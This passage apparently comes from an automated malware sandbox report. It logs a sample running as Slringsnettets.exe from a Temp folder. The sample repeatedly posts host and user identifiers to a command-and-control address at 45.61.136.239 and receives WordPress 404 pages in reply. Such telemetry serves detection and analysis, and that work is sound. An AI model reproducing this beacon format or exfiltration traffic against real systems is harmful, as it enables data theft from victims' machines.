70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:16.522722006 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:16.522736073 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:16.522759914 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:16.522772074 CEST	1236	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:16.522790909 CEST	1236	IN	Data Raw: 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c Data Ascii: wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-sep
Jul 4, 2024 08:23:16.522805929 CEST	1236	IN	Data Raw: 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 Data Ascii: */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text
Jul 4, 2024 08:23:16.523030996 CEST	108	IN	Data Raw: 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 Data Ascii: 0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0
Jul 4, 2024 08:23:16.523045063 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:23:16.523066044 CEST	1236	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:16.685864925 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:16.691210032 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:19.572016954 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:17 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:19.572062969 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:19.572073936 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:19.572118044 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:19.572129965 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:19.572227001 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:19.572237015 CEST	224	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1
Jul 4, 2024 08:23:19.572360992 CEST	1236	IN	Data Raw: 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 Data Ascii: .25em 2.375em}</style><style id='classic-theme-styles-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;paddin
Jul 4, 2024 08:23:19.572370052 CEST	224	IN	Data Raw: 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c Data Ascii: --gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0
Jul 4, 2024 08:23:19.572376966 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49750	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:19.733205080 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:19.738110065 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:22.699068069 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:20 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:22.699095964 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:22.699117899 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:22.699208975 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:22.699223995 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:22.699317932 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:22.699338913 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:23:22.699501038 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:23:22.699551105 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:23:22.699562073 CEST	1236	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49751	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:22.867672920 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:22.872654915 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
